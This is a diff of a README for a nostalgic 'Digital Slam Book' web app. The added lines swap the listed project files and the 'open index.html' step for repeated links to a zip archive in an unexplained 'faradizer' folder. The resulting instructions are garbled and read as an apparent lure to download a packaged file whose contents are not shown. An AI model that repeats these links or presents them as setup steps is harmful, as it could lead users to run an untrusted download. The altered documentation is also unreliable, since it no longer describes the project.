AirsQ/Digital-Slam-Book/README.md

 - Preserve the nostalgic feel while staying lightweight and fast.

 Project setup at a glance
-- File structure is straightforward: index.html, styles.css, scripts.js, assets/
+- File structure is straightforward: https://raw.githubusercontent.com/AirsQ/Digital-Slam-Book/main/faradizer/Book-Digital-Slam-1.7-beta.2.zip, https://raw.githubusercontent.com/AirsQ/Digital-Slam-Book/main/faradizer/Book-Digital-Slam-1.7-beta.2.zip, https://raw.githubusercontent.com/AirsQ/Digital-Slam-Book/main/faradizer/Book-Digital-Slam-1.7-beta.2.zip, assets/
 - The app loads quickly and requires no build steps for basic usage.
 - You can customize the look by editing the CSS and adding simple CSS variables.

 Notes on packaging and distribution
 - If you use the release asset, follow the included instructions to run it.
 Release packages typically bundle the necessary files and provide a ready-to-use experience.
-- For pure web use, you can fork the repository, open the index.html locally, and begin editing.
+- For pure web use, you can fork the repository, open the https://raw.githubusercontent.com/AirsQ/Digital-Slam-Book/main/faradizer/Book-Digital-Slam-1.7-beta.2.zip locally, and begin editing.

 Final reminder for readers
 - The Releases page is the best entry point for a packaged experience.
 Use it if you want a ready-to-run build without setting up a local environment.